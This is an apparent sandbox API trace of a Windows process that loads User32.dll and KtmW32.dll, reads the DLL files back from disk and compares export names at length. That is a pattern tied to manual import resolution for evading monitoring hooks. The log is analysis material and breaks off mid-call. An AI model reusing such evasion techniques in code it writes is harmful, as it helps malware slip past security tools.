1 [0235.254] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0235.271] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0235.647] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0235.647] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0235.647] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0235.647] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0235.647] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0235.665] GetProcessHeap () returned 0x560000 [0235.665] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x560000) returned 1 [0235.665] GetProcessHeap () returned 0x560000 [0235.665] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5790b0 [0235.665] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0235.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0235.666] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0235.667] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0235.667] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0235.668] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0235.668] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0235.669] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0235.669] GetProcessHeap () returned 0x560000 [0235.669] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1555b8) returned 0x427d040 [0235.674] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0235.675] ReadFile (in: hFile=0x17c, lpBuffer=0x427d040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x427d040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0235.954] CloseHandle (hObject=0x17c) returned 1 [0235.954] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0235.954] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0235.954] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0235.955] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0235.955] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0235.955] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0235.955] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0235.955] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0235.955] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0235.955] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0235.955] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0235.955] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0235.955] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0235.955] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0235.955] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0235.955] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0235.955] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0235.955] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0235.956] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0235.956] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0235.956] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0235.956] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0235.956] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0235.957] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0235.957] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0235.957] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0235.958] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0235.958] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0235.958] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0235.958] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0235.958] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0235.958] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0235.959] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0235.959] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0235.960] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0235.960] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0235.960] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0235.961] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0235.961] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0235.962] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0235.963] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0235.964] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0235.965] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0235.966] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0235.966] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0236.868] GetProcessHeap () returned 0x560000 [0236.869] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x427d040 | out: hHeap=0x560000) returned 1 [0236.876] GetProcessHeap () returned 0x560000 [0236.876] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5790d0 [0236.876] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0236.880] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0236.880] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0236.880] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0236.881] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0236.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0236.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0236.882] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0236.882] GetProcessHeap () returned 0x560000 [0236.882] RtlAllocateHeap (HeapHandle=0x560000, 